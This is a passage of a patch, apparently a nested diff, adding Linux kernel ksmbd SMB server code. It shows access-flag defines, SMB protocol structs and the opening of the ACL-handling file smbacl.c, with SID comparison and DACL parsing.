++#define FILE_READ_ONLY_VOLUME		0x00080000
++#define FILE_NAMED_STREAMS		0x00040000
++#define FILE_SUPPORTS_ENCRYPTION	0x00020000
++#define FILE_SUPPORTS_OBJECT_IDS	0x00010000
++#define FILE_VOLUME_IS_COMPRESSED	0x00008000
++#define FILE_SUPPORTS_REMOTE_STORAGE	0x00000100
++#define FILE_SUPPORTS_REPARSE_POINTS	0x00000080
++#define FILE_SUPPORTS_SPARSE_FILES	0x00000040
++#define FILE_VOLUME_QUOTAS		0x00000020
++#define FILE_FILE_COMPRESSION		0x00000010
++#define FILE_PERSISTENT_ACLS		0x00000008
++#define FILE_UNICODE_ON_DISK		0x00000004
++#define FILE_CASE_PRESERVED_NAMES	0x00000002
++#define FILE_CASE_SENSITIVE_SEARCH	0x00000001
++
++#define FILE_READ_DATA        0x00000001  /* Data can be read from the file   */
++#define FILE_WRITE_DATA       0x00000002  /* Data can be written to the file  */
++#define FILE_APPEND_DATA      0x00000004  /* Data can be appended to the file */
++#define FILE_READ_EA          0x00000008  /* Extended attributes associated   */
++/* with the file can be read        */
++#define FILE_WRITE_EA         0x00000010  /* Extended attributes associated   */
++/* with the file can be written     */
++#define FILE_EXECUTE          0x00000020  /*Data can be read into memory from */
++/* the file using system paging I/O */
++#define FILE_DELETE_CHILD     0x00000040
++#define FILE_READ_ATTRIBUTES  0x00000080  /* Attributes associated with the   */
++/* file can be read                 */
++#define FILE_WRITE_ATTRIBUTES 0x00000100  /* Attributes associated with the   */
++/* file can be written              */
++#define DELETE                0x00010000  /* The file can be deleted          */
++#define READ_CONTROL          0x00020000  /* The access control list and      */
++/* ownership associated with the    */
++/* file can be read                 */
++#define WRITE_DAC             0x00040000  /* The access control list and      */
++/* ownership associated with the    */
++/* file can be written.             */
++#define WRITE_OWNER           0x00080000  /* Ownership information associated */
++/* with the file can be written     */
++#define SYNCHRONIZE           0x00100000  /* The file handle can waited on to */
++/* synchronize with the completion  */
++/* of an input/output request       */
++#define GENERIC_ALL           0x10000000
++#define GENERIC_EXECUTE       0x20000000
++#define GENERIC_WRITE         0x40000000
++#define GENERIC_READ          0x80000000
++/* In summary - Relevant file       */
++/* access flags from CIFS are       */
++/* file_read_data, file_write_data  */
++/* file_execute, file_read_attributes*/
++/* write_dac, and delete.           */
++
++#define SET_FILE_READ_RIGHTS (FILE_READ_DATA | FILE_READ_EA \
++		| FILE_READ_ATTRIBUTES \
++		| DELETE | READ_CONTROL | WRITE_DAC \
++		| WRITE_OWNER | SYNCHRONIZE)
++#define SET_FILE_WRITE_RIGHTS (FILE_WRITE_DATA | FILE_APPEND_DATA \
++		| FILE_WRITE_EA \
++		| FILE_DELETE_CHILD \
++		| FILE_WRITE_ATTRIBUTES \
++		| DELETE | READ_CONTROL | WRITE_DAC \
++		| WRITE_OWNER | SYNCHRONIZE)
++#define SET_FILE_EXEC_RIGHTS (FILE_READ_EA | FILE_WRITE_EA | FILE_EXECUTE \
++		| FILE_READ_ATTRIBUTES \
++		| FILE_WRITE_ATTRIBUTES \
++		| DELETE | READ_CONTROL | WRITE_DAC \
++		| WRITE_OWNER | SYNCHRONIZE)
++
++#define SET_MINIMUM_RIGHTS (FILE_READ_EA | FILE_READ_ATTRIBUTES \
++		| READ_CONTROL | SYNCHRONIZE)
++
++/* generic flags for file open */
++#define GENERIC_READ_FLAGS	(READ_CONTROL | FILE_READ_DATA | \
++		FILE_READ_ATTRIBUTES | \
++		FILE_READ_EA | SYNCHRONIZE)
++
++#define GENERIC_WRITE_FLAGS	(READ_CONTROL | FILE_WRITE_DATA | \
++		FILE_WRITE_ATTRIBUTES | FILE_WRITE_EA | \
++		FILE_APPEND_DATA | SYNCHRONIZE)
++
++#define GENERIC_EXECUTE_FLAGS	(READ_CONTROL | FILE_EXECUTE | \
++		FILE_READ_ATTRIBUTES | SYNCHRONIZE)
++
++#define GENERIC_ALL_FLAGS	(DELETE | READ_CONTROL | WRITE_DAC | \
++		WRITE_OWNER | SYNCHRONIZE | FILE_READ_DATA | \
++		FILE_WRITE_DATA | FILE_APPEND_DATA | \
++		FILE_READ_EA | FILE_WRITE_EA | \
++		FILE_EXECUTE | FILE_DELETE_CHILD | \
++		FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES)
++
++#define SMB1_PROTO_NUMBER		cpu_to_le32(0x424d53ff)
++#define SMB_COM_NEGOTIATE		0x72
++#define SMB1_CLIENT_GUID_SIZE		(16)
++
++#define SMBFLG_RESPONSE 0x80	/* this PDU is a response from server */
++
++#define SMBFLG2_IS_LONG_NAME	cpu_to_le16(0x40)
++#define SMBFLG2_EXT_SEC		cpu_to_le16(0x800)
++#define SMBFLG2_ERR_STATUS	cpu_to_le16(0x4000)
++#define SMBFLG2_UNICODE		cpu_to_le16(0x8000)
++
++struct smb_hdr {
++	__be32 smb_buf_length;
++	__u8 Protocol[4];
++	__u8 Command;
++	union {
++		struct {
++			__u8 ErrorClass;
++			__u8 Reserved;
++			__le16 Error;
++		} __packed DosError;
++		__le32 CifsError;
++	} __packed Status;
++	__u8 Flags;
++	__le16 Flags2;          /* note: le */
++	__le16 PidHigh;
++	union {
++		struct {
++			__le32 SequenceNumber;  /* le */
++			__u32 Reserved; /* zero */
++		} __packed Sequence;
++		__u8 SecuritySignature[8];      /* le */
++	} __packed Signature;
++	__u8 pad[2];
++	__le16 Tid;
++	__le16 Pid;
++	__le16 Uid;
++	__le16 Mid;
++	__u8 WordCount;
++} __packed;
++
++struct smb_negotiate_req {
++	struct smb_hdr hdr;     /* wct = 0 */
++	__le16 ByteCount;
++	unsigned char DialectsArray[1];
++} __packed;
++
++struct smb_negotiate_rsp {
++	struct smb_hdr hdr;     /* wct = 17 */
++	__le16 DialectIndex; /* 0xFFFF = no dialect acceptable */
++	__le16 ByteCount;
++} __packed;
++
++struct filesystem_attribute_info {
++	__le32 Attributes;
++	__le32 MaxPathNameComponentLength;
++	__le32 FileSystemNameLen;
++	__le16 FileSystemName[1]; /* do not have to save this - get subset? */
++} __packed;
++
++struct filesystem_device_info {
++	__le32 DeviceType;
++	__le32 DeviceCharacteristics;
++} __packed; /* device info level 0x104 */
++
++struct filesystem_vol_info {
++	__le64 VolumeCreationTime;
++	__le32 SerialNumber;
++	__le32 VolumeLabelSize;
++	__le16 Reserved;
++	__le16 VolumeLabel[1];
++} __packed;
++
++struct filesystem_info {
++	__le64 TotalAllocationUnits;
++	__le64 FreeAllocationUnits;
++	__le32 SectorsPerAllocationUnit;
++	__le32 BytesPerSector;
++} __packed;     /* size info, level 0x103 */
++
++#define EXTENDED_INFO_MAGIC 0x43667364	/* Cfsd */
++#define STRING_LENGTH 28
++
++struct fs_extended_info {
++	__le32 magic;
++	__le32 version;
++	__le32 release;
++	__u64 rel_date;
++	char    version_string[STRING_LENGTH];
++} __packed;
++
++struct object_id_info {
++	char objid[16];
++	struct fs_extended_info extended_info;
++} __packed;
++
++struct file_directory_info {
++	__le32 NextEntryOffset;
++	__u32 FileIndex;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 ExtFileAttributes;
++	__le32 FileNameLength;
++	char FileName[1];
++} __packed;   /* level 0x101 FF resp data */
++
++struct file_names_info {
++	__le32 NextEntryOffset;
++	__u32 FileIndex;
++	__le32 FileNameLength;
++	char FileName[1];
++} __packed;   /* level 0xc FF resp data */
++
++struct file_full_directory_info {
++	__le32 NextEntryOffset;
++	__u32 FileIndex;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 ExtFileAttributes;
++	__le32 FileNameLength;
++	__le32 EaSize;
++	char FileName[1];
++} __packed; /* level 0x102 FF resp */
++
++struct file_both_directory_info {
++	__le32 NextEntryOffset;
++	__u32 FileIndex;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 ExtFileAttributes;
++	__le32 FileNameLength;
++	__le32 EaSize; /* length of the xattrs */
++	__u8   ShortNameLength;
++	__u8   Reserved;
++	__u8   ShortName[24];
++	char FileName[1];
++} __packed; /* level 0x104 FFrsp data */
++
++struct file_id_both_directory_info {
++	__le32 NextEntryOffset;
++	__u32 FileIndex;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 ExtFileAttributes;
++	__le32 FileNameLength;
++	__le32 EaSize; /* length of the xattrs */
++	__u8   ShortNameLength;
++	__u8   Reserved;
++	__u8   ShortName[24];
++	__le16 Reserved2;
++	__le64 UniqueId;
++	char FileName[1];
++} __packed;
++
++struct file_id_full_dir_info {
++	__le32 NextEntryOffset;
++	__u32 FileIndex;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 ExtFileAttributes;
++	__le32 FileNameLength;
++	__le32 EaSize; /* EA size */
++	__le32 Reserved;
++	__le64 UniqueId; /* inode num - le since Samba puts ino in low 32 bit*/
++	char FileName[1];
++} __packed; /* level 0x105 FF rsp data */
++
++struct smb_version_values {
++	char		*version_string;
++	__u16		protocol_id;
++	__le16		lock_cmd;
++	__u32		capabilities;
++	__u32		max_read_size;
++	__u32		max_write_size;
++	__u32		max_trans_size;
++	__u32		max_credits;
++	__u32		large_lock_type;
++	__u32		exclusive_lock_type;
++	__u32		shared_lock_type;
++	__u32		unlock_lock_type;
++	size_t		header_size;
++	size_t		max_header_size;
++	size_t		read_rsp_size;
++	unsigned int	cap_unix;
++	unsigned int	cap_nt_find;
++	unsigned int	cap_large_files;
++	__u16		signing_enabled;
++	__u16		signing_required;
++	size_t		create_lease_size;
++	size_t		create_durable_size;
++	size_t		create_durable_v2_size;
++	size_t		create_mxac_size;
++	size_t		create_disk_id_size;
++	size_t		create_posix_size;
++};
++
++struct filesystem_posix_info {
++	/* For undefined recommended transfer size return -1 in that field */
++	__le32 OptimalTransferSize;  /* bsize on some os, iosize on other os */
++	__le32 BlockSize;
++	/* The next three fields are in terms of the block size.
++	 * (above). If block size is unknown, 4096 would be a
++	 * reasonable block size for a server to report.
++	 * Note that returning the blocks/blocksavail removes need
++	 * to make a second call (to QFSInfo level 0x103 to get this info.
++	 * UserBlockAvail is typically less than or equal to BlocksAvail,
++	 * if no distinction is made return the same value in each
++	 */
++	__le64 TotalBlocks;
++	__le64 BlocksAvail;       /* bfree */
++	__le64 UserBlocksAvail;   /* bavail */
++	/* For undefined Node fields or FSID return -1 */
++	__le64 TotalFileNodes;
++	__le64 FreeFileNodes;
++	__le64 FileSysIdentifier;   /* fsid */
++	/* NB Namelen comes from FILE_SYSTEM_ATTRIBUTE_INFO call */
++	/* NB flags can come from FILE_SYSTEM_DEVICE_INFO call   */
++} __packed;
++
++struct smb_version_ops {
++	u16 (*get_cmd_val)(struct ksmbd_work *swork);
++	int (*init_rsp_hdr)(struct ksmbd_work *swork);
++	void (*set_rsp_status)(struct ksmbd_work *swork, __le32 err);
++	int (*allocate_rsp_buf)(struct ksmbd_work *work);
++	int (*set_rsp_credits)(struct ksmbd_work *work);
++	int (*check_user_session)(struct ksmbd_work *work);
++	int (*get_ksmbd_tcon)(struct ksmbd_work *work);
++	bool (*is_sign_req)(struct ksmbd_work *work, unsigned int command);
++	int (*check_sign_req)(struct ksmbd_work *work);
++	void (*set_sign_rsp)(struct ksmbd_work *work);
++	int (*generate_signingkey)(struct ksmbd_session *sess, struct ksmbd_conn *conn);
++	int (*generate_encryptionkey)(struct ksmbd_conn *conn, struct ksmbd_session *sess);
++	bool (*is_transform_hdr)(void *buf);
++	int (*decrypt_req)(struct ksmbd_work *work);
++	int (*encrypt_resp)(struct ksmbd_work *work);
++};
++
++struct smb_version_cmds {
++	int (*proc)(struct ksmbd_work *swork);
++};
++
++int ksmbd_min_protocol(void);
++int ksmbd_max_protocol(void);
++
++int ksmbd_lookup_protocol_idx(char *str);
++
++int ksmbd_verify_smb_message(struct ksmbd_work *work);
++bool ksmbd_smb_request(struct ksmbd_conn *conn);
++
++int ksmbd_lookup_dialect_by_id(__le16 *cli_dialects, __le16 dialects_count);
++
++void ksmbd_init_smb_server(struct ksmbd_work *work);
++
++struct ksmbd_kstat;
++int ksmbd_populate_dot_dotdot_entries(struct ksmbd_work *work,
++				      int info_level,
++				      struct ksmbd_file *dir,
++				      struct ksmbd_dir_info *d_info,
++				      char *search_pattern,
++				      int (*fn)(struct ksmbd_conn *,
++						int,
++						struct ksmbd_dir_info *,
++						struct ksmbd_kstat *));
++
++int ksmbd_extract_shortname(struct ksmbd_conn *conn,
++			    const char *longname,
++			    char *shortname);
++
++int ksmbd_smb_negotiate_common(struct ksmbd_work *work, unsigned int command);
++
++int ksmbd_smb_check_shared_mode(struct file *filp, struct ksmbd_file *curr_fp);
++int ksmbd_override_fsids(struct ksmbd_work *work);
++void ksmbd_revert_fsids(struct ksmbd_work *work);
++
++unsigned int ksmbd_server_side_copy_max_chunk_count(void);
++unsigned int ksmbd_server_side_copy_max_chunk_size(void);
++unsigned int ksmbd_server_side_copy_max_total_size(void);
++bool is_asterisk(char *p);
++__le32 smb_map_generic_desired_access(__le32 daccess);
++
++static inline unsigned int get_rfc1002_len(void *buf)
++{
++	return be32_to_cpu(*((__be32 *)buf)) & 0xffffff;
++}
++
++static inline void inc_rfc1001_len(void *buf, int count)
++{
++	be32_add_cpu((__be32 *)buf, count);
++}
++#endif /* __SMB_COMMON_H__ */
+diff --git a/fs/smb/server/smbacl.c b/fs/smb/server/smbacl.c
+new file mode 100644
+index 0000000000000..b05ff9b146b55
+--- /dev/null
++++ b/fs/smb/server/smbacl.c
+@@ -0,0 +1,1436 @@
++// SPDX-License-Identifier: LGPL-2.1+
++/*
++ *   Copyright (C) International Business Machines  Corp., 2007,2008
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *   Copyright (C) 2020 Samsung Electronics Co., Ltd.
++ *   Author(s): Namjae Jeon <linkinjeon@kernel.org>
++ */
++
++#include <linux/fs.h>
++#include <linux/slab.h>
++#include <linux/string.h>
++#include <linux/mnt_idmapping.h>
++
++#include "smbacl.h"
++#include "smb_common.h"
++#include "server.h"
++#include "misc.h"
++#include "mgmt/share_config.h"
++
++static const struct smb_sid domain = {1, 4, {0, 0, 0, 0, 0, 5},
++	{cpu_to_le32(21), cpu_to_le32(1), cpu_to_le32(2), cpu_to_le32(3),
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
++
++/* security id for everyone/world system group */
++static const struct smb_sid creator_owner = {
++	1, 1, {0, 0, 0, 0, 0, 3}, {0} };
++/* security id for everyone/world system group */
++static const struct smb_sid creator_group = {
++	1, 1, {0, 0, 0, 0, 0, 3}, {cpu_to_le32(1)} };
++
++/* security id for everyone/world system group */
++static const struct smb_sid sid_everyone = {
++	1, 1, {0, 0, 0, 0, 0, 1}, {0} };
++/* security id for Authenticated Users system group */
++static const struct smb_sid sid_authusers = {
++	1, 1, {0, 0, 0, 0, 0, 5}, {cpu_to_le32(11)} };
++
++/* S-1-22-1 Unmapped Unix users */
++static const struct smb_sid sid_unix_users = {1, 1, {0, 0, 0, 0, 0, 22},
++		{cpu_to_le32(1), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
++
++/* S-1-22-2 Unmapped Unix groups */
++static const struct smb_sid sid_unix_groups = { 1, 1, {0, 0, 0, 0, 0, 22},
++		{cpu_to_le32(2), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
++
++/*
++ * See http://technet.microsoft.com/en-us/library/hh509017(v=ws.10).aspx
++ */
++
++/* S-1-5-88 MS NFS and Apple style UID/GID/mode */
++
++/* S-1-5-88-1 Unix uid */
++static const struct smb_sid sid_unix_NFS_users = { 1, 2, {0, 0, 0, 0, 0, 5},
++	{cpu_to_le32(88),
++	 cpu_to_le32(1), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
++
++/* S-1-5-88-2 Unix gid */
++static const struct smb_sid sid_unix_NFS_groups = { 1, 2, {0, 0, 0, 0, 0, 5},
++	{cpu_to_le32(88),
++	 cpu_to_le32(2), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
++
++/* S-1-5-88-3 Unix mode */
++static const struct smb_sid sid_unix_NFS_mode = { 1, 2, {0, 0, 0, 0, 0, 5},
++	{cpu_to_le32(88),
++	 cpu_to_le32(3), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
++
++/*
++ * if the two SIDs (roughly equivalent to a UUID for a user or group) are
++ * the same returns zero, if they do not match returns non-zero.
++ */
++int compare_sids(const struct smb_sid *ctsid, const struct smb_sid *cwsid)
++{
++	int i;
++	int num_subauth, num_sat, num_saw;
++
++	if (!ctsid || !cwsid)
++		return 1;
++
++	/* compare the revision */
++	if (ctsid->revision != cwsid->revision) {
++		if (ctsid->revision > cwsid->revision)
++			return 1;
++		else
++			return -1;
++	}
++
++	/* compare all of the six auth values */
++	for (i = 0; i < NUM_AUTHS; ++i) {
++		if (ctsid->authority[i] != cwsid->authority[i]) {
++			if (ctsid->authority[i] > cwsid->authority[i])
++				return 1;
++			else
++				return -1;
++		}
++	}
++
++	/* compare all of the subauth values if any */
++	num_sat = ctsid->num_subauth;
++	num_saw = cwsid->num_subauth;
++	num_subauth = num_sat < num_saw ? num_sat : num_saw;
++	if (num_subauth) {
++		for (i = 0; i < num_subauth; ++i) {
++			if (ctsid->sub_auth[i] != cwsid->sub_auth[i]) {
++				if (le32_to_cpu(ctsid->sub_auth[i]) >
++				    le32_to_cpu(cwsid->sub_auth[i]))
++					return 1;
++				else
++					return -1;
++			}
++		}
++	}
++
++	return 0; /* sids compare/match */
++}
++
++static void smb_copy_sid(struct smb_sid *dst, const struct smb_sid *src)
++{
++	int i;
++
++	dst->revision = src->revision;
++	dst->num_subauth = min_t(u8, src->num_subauth, SID_MAX_SUB_AUTHORITIES);
++	for (i = 0; i < NUM_AUTHS; ++i)
++		dst->authority[i] = src->authority[i];
++	for (i = 0; i < dst->num_subauth; ++i)
++		dst->sub_auth[i] = src->sub_auth[i];
++}
++
++/*
++ * change posix mode to reflect permissions
++ * pmode is the existing mode (we only want to overwrite part of this
++ * bits to set can be: S_IRWXU, S_IRWXG or S_IRWXO ie 00700 or 00070 or 00007
++ */
++static umode_t access_flags_to_mode(struct smb_fattr *fattr, __le32 ace_flags,
++				    int type)
++{
++	__u32 flags = le32_to_cpu(ace_flags);
++	umode_t mode = 0;
++
++	if (flags & GENERIC_ALL) {
++		mode = 0777;
++		ksmbd_debug(SMB, "all perms\n");
++		return mode;
++	}
++
++	if ((flags & GENERIC_READ) || (flags & FILE_READ_RIGHTS))
++		mode = 0444;
++	if ((flags & GENERIC_WRITE) || (flags & FILE_WRITE_RIGHTS)) {
++		mode |= 0222;
++		if (S_ISDIR(fattr->cf_mode))
++			mode |= 0111;
++	}
++	if ((flags & GENERIC_EXECUTE) || (flags & FILE_EXEC_RIGHTS))
++		mode |= 0111;
++
++	if (type == ACCESS_DENIED_ACE_TYPE || type == ACCESS_DENIED_OBJECT_ACE_TYPE)
++		mode = ~mode;
++
++	ksmbd_debug(SMB, "access flags 0x%x mode now %04o\n", flags, mode);
++
++	return mode;
++}
++
++/*
++ * Generate access flags to reflect permissions mode is the existing mode.
++ * This function is called for every ACE in the DACL whose SID matches
++ * with either owner or group or everyone.
++ */
++static void mode_to_access_flags(umode_t mode, umode_t bits_to_use,
++				 __u32 *pace_flags)
++{
++	/* reset access mask */
++	*pace_flags = 0x0;
++
++	/* bits to use are either S_IRWXU or S_IRWXG or S_IRWXO */
++	mode &= bits_to_use;
++
++	/*
++	 * check for R/W/X UGO since we do not know whose flags
++	 * is this but we have cleared all the bits sans RWX for
++	 * either user or group or other as per bits_to_use
++	 */
++	if (mode & 0444)
++		*pace_flags |= SET_FILE_READ_RIGHTS;
++	if (mode & 0222)
++		*pace_flags |= FILE_WRITE_RIGHTS;
++	if (mode & 0111)
++		*pace_flags |= SET_FILE_EXEC_RIGHTS;
++
++	ksmbd_debug(SMB, "mode: %o, access flags now 0x%x\n",
++		    mode, *pace_flags);
++}
++
++static __u16 fill_ace_for_sid(struct smb_ace *pntace,
++			      const struct smb_sid *psid, int type, int flags,
++			      umode_t mode, umode_t bits)
++{
++	int i;
++	__u16 size = 0;
++	__u32 access_req = 0;
++
++	pntace->type = type;
++	pntace->flags = flags;
++	mode_to_access_flags(mode, bits, &access_req);
++	if (!access_req)
++		access_req = SET_MINIMUM_RIGHTS;
++	pntace->access_req = cpu_to_le32(access_req);
++
++	pntace->sid.revision = psid->revision;
++	pntace->sid.num_subauth = psid->num_subauth;
++	for (i = 0; i < NUM_AUTHS; i++)
++		pntace->sid.authority[i] = psid->authority[i];
++	for (i = 0; i < psid->num_subauth; i++)
++		pntace->sid.sub_auth[i] = psid->sub_auth[i];
++
++	size = 1 + 1 + 2 + 4 + 1 + 1 + 6 + (psid->num_subauth * 4);
++	pntace->size = cpu_to_le16(size);
++
++	return size;
++}
++
++void id_to_sid(unsigned int cid, uint sidtype, struct smb_sid *ssid)
++{
++	switch (sidtype) {
++	case SIDOWNER:
++		smb_copy_sid(ssid, &server_conf.domain_sid);
++		break;
++	case SIDUNIX_USER:
++		smb_copy_sid(ssid, &sid_unix_users);
++		break;
++	case SIDUNIX_GROUP:
++		smb_copy_sid(ssid, &sid_unix_groups);
++		break;
++	case SIDCREATOR_OWNER:
++		smb_copy_sid(ssid, &creator_owner);
++		return;
++	case SIDCREATOR_GROUP:
++		smb_copy_sid(ssid, &creator_group);
++		return;
++	case SIDNFS_USER:
++		smb_copy_sid(ssid, &sid_unix_NFS_users);
++		break;
++	case SIDNFS_GROUP:
++		smb_copy_sid(ssid, &sid_unix_NFS_groups);
++		break;
++	case SIDNFS_MODE:
++		smb_copy_sid(ssid, &sid_unix_NFS_mode);
++		break;
++	default:
++		return;
++	}
++
++	/* RID */
++	ssid->sub_auth[ssid->num_subauth] = cpu_to_le32(cid);
++	ssid->num_subauth++;
++}
++
++static int sid_to_id(struct user_namespace *user_ns,
++		     struct smb_sid *psid, uint sidtype,
++		     struct smb_fattr *fattr)
++{
++	int rc = -EINVAL;
++
++	/*
++	 * If we have too many subauthorities, then something is really wrong.
++	 * Just return an error.
++	 */
++	if (unlikely(psid->num_subauth > SID_MAX_SUB_AUTHORITIES)) {
++		pr_err("%s: %u subauthorities is too many!\n",
++		       __func__, psid->num_subauth);
++		return -EIO;
++	}
++
++	if (sidtype == SIDOWNER) {
++		kuid_t uid;
++		uid_t id;
++
++		id = le32_to_cpu(psid->sub_auth[psid->num_subauth - 1]);
++		uid = KUIDT_INIT(id);
++		uid = from_vfsuid(user_ns, &init_user_ns, VFSUIDT_INIT(uid));
++		if (uid_valid(uid)) {
++			fattr->cf_uid = uid;
++			rc = 0;
++		}
++	} else {
++		kgid_t gid;
++		gid_t id;
++
++		id = le32_to_cpu(psid->sub_auth[psid->num_subauth - 1]);
++		gid = KGIDT_INIT(id);
++		gid = from_vfsgid(user_ns, &init_user_ns, VFSGIDT_INIT(gid));
++		if (gid_valid(gid)) {
++			fattr->cf_gid = gid;
++			rc = 0;
++		}
++	}
++
++	return rc;
++}
++
++void posix_state_to_acl(struct posix_acl_state *state,
++			struct posix_acl_entry *pace)
++{
++	int i;
++
++	pace->e_tag = ACL_USER_OBJ;
++	pace->e_perm = state->owner.allow;
++	for (i = 0; i < state->users->n; i++) {
++		pace++;
++		pace->e_tag = ACL_USER;
++		pace->e_uid = state->users->aces[i].uid;
++		pace->e_perm = state->users->aces[i].perms.allow;
++	}
++
++	pace++;
++	pace->e_tag = ACL_GROUP_OBJ;
++	pace->e_perm = state->group.allow;
++
++	for (i = 0; i < state->groups->n; i++) {
++		pace++;
++		pace->e_tag = ACL_GROUP;
++		pace->e_gid = state->groups->aces[i].gid;
++		pace->e_perm = state->groups->aces[i].perms.allow;
++	}
++
++	if (state->users->n || state->groups->n) {
++		pace++;
++		pace->e_tag = ACL_MASK;
++		pace->e_perm = state->mask.allow;
++	}
++
++	pace++;
++	pace->e_tag = ACL_OTHER;
++	pace->e_perm = state->other.allow;
++}
++
++int init_acl_state(struct posix_acl_state *state, int cnt)
++{
++	int alloc;
++
++	memset(state, 0, sizeof(struct posix_acl_state));
++	/*
++	 * In the worst case, each individual acl could be for a distinct
++	 * named user or group, but we don't know which, so we allocate
++	 * enough space for either:
++	 */
++	alloc = sizeof(struct posix_ace_state_array)
++		+ cnt * sizeof(struct posix_user_ace_state);
++	state->users = kzalloc(alloc, GFP_KERNEL);
++	if (!state->users)
++		return -ENOMEM;
++	state->groups = kzalloc(alloc, GFP_KERNEL);
++	if (!state->groups) {
++		kfree(state->users);
++		return -ENOMEM;
++	}
++	return 0;
++}
++
++void free_acl_state(struct posix_acl_state *state)
++{
++	kfree(state->users);
++	kfree(state->groups);
++}
++
++static void parse_dacl(struct user_namespace *user_ns,
++		       struct smb_acl *pdacl, char *end_of_acl,
++		       struct smb_sid *pownersid, struct smb_sid *pgrpsid,
++		       struct smb_fattr *fattr)
++{
++	int i, ret;
++	int num_aces = 0;
++	unsigned int acl_size;
++	char *acl_base;
++	struct smb_ace **ppace;
++	struct posix_acl_entry *cf_pace, *cf_pdace;
++	struct posix_acl_state acl_state, default_acl_state;
++	umode_t mode = 0, acl_mode;
++	bool owner_found = false, group_found = false, others_found = false;
++
++	if (!pdacl)
++		return;
++
++	/* validate that we do not go past end of acl */
++	if (end_of_acl < (char *)pdacl + sizeof(struct smb_acl) ||
++	    end_of_acl < (char *)pdacl + le16_to_cpu(pdacl->size)) {
++		pr_err("ACL too small to parse DACL\n");
++		return;
++	}
++
++	ksmbd_debug(SMB, "DACL revision %d size %d num aces %d\n",
++		    le16_to_cpu(pdacl->revision), le16_to_cpu(pdacl->size),
++		    le32_to_cpu(pdacl->num_aces));
++
++	acl_base = (char *)pdacl;
++	acl_size = sizeof(struct smb_acl);
++
++	num_aces = le32_to_cpu(pdacl->num_aces);
++	if (num_aces <= 0)
++		return;
++
++	if (num_aces > ULONG_MAX / sizeof(struct smb_ace *))
++		return;
++
++	ppace = kmalloc_array(num_aces, sizeof(struct smb_ace *), GFP_KERNEL);
++	if (!ppace)
++		return;
++
++	ret = init_acl_state(&acl_state, num_aces);
++	if (ret)
++		return;
++	ret = init_acl_state(&default_acl_state, num_aces);
++	if (ret) {
++		free_acl_state(&acl_state);
++		return;
++	}
++
++	/*
++	 * reset rwx permissions for user/group/other.
++	 * Also, if num_aces is 0 i.e. DACL has no ACEs,
++	 * user/group/other have no permissions
++	 */
++	for (i = 0; i < num_aces; ++i) {
++		if (end_of_acl - acl_base < acl_size)
++			break;
++
++		ppace[i] = (struct smb_ace *)(acl_base + acl_size);
++		acl_base = (char *)ppace[i];
++		acl_size = offsetof(struct smb_ace, sid) +
++			offsetof(struct smb_sid, sub_auth);
++
++		if (end_of_acl - acl_base < acl_size ||
++		    ppace[i]->sid.num_subauth > SID_MAX_SUB_AUTHORITIES ||
++		    (end_of_acl - acl_base <
++		     acl_size + sizeof(__le32) * ppace[i]->sid.num_subauth) ||
++		    (le16_to_cpu(ppace[i]->size) <
++		     acl_size + sizeof(__le32) * ppace[i]->sid.num_subauth))
++			break;
++
++		acl_size = le16_to_cpu(ppace[i]->size);
++		ppace[i]->access_req =
++			smb_map_generic_desired_access(ppace[i]->access_req);
++
++		if (!(compare_sids(&ppace[i]->sid, &sid_unix_NFS_mode))) {
++			fattr->cf_mode =
++				le32_to_cpu(ppace[i]->sid.sub_auth[2]);
++			break;
++		} else if (!compare_sids(&ppace[i]->sid, pownersid)) {
++			acl_mode = access_flags_to_mode(fattr,
++							ppace[i]->access_req,
++							ppace[i]->type);
++			acl_mode &= 0700;
++
++			if (!owner_found) {
++				mode &= ~(0700);
++				mode |= acl_mode;
++			}
++			owner_found = true;
++		} else if (!compare_sids(&ppace[i]->sid, pgrpsid) ||
++			   ppace[i]->sid.sub_auth[ppace[i]->sid.num_subauth - 1] ==
++			    DOMAIN_USER_RID_LE) {
++			acl_mode = access_flags_to_mode(fattr,
++							ppace[i]->access_req,
++							ppace[i]->type);
++			acl_mode &= 0070;
++			if (!group_found) {
++				mode &= ~(0070);
++				mode |= acl_mode;
++			}
++			group_found = true;
++		} else if (!compare_sids(&ppace[i]->sid, &sid_everyone)) {
++			acl_mode = access_flags_to_mode(fattr,
++							ppace[i]->access_req,
++							ppace[i]->type);
++			acl_mode &= 0007;
++			if (!others_found) {
++				mode &= ~(0007);
++				mode |= acl_mode;
++			}
++			others_found = true;
++		} else if (!compare_sids(&ppace[i]->sid, &creator_owner)) {
++			continue;
++		} else if (!compare_sids(&ppace[i]->sid, &creator_group)) {
++			continue;
++		} else if (!compare_sids(&ppace[i]->sid, &sid_authusers)) {
++			continue;
++		} else {
++			struct smb_fattr temp_fattr;
++
++			acl_mode = access_flags_to_mode(fattr, ppace[i]->access_req,
++							ppace[i]->type);
++			temp_fattr.cf_uid = INVALID_UID;
++			ret = sid_to_id(user_ns, &ppace[i]->sid, SIDOWNER, &temp_fattr);
++			if (ret || uid_eq(temp_fattr.cf_uid, INVALID_UID)) {
++				pr_err("%s: Error %d mapping Owner SID to uid\n",
++				       __func__, ret);
++				continue;
++			}
++
++			acl_state.owner.allow = ((acl_mode & 0700) >> 6) | 0004;
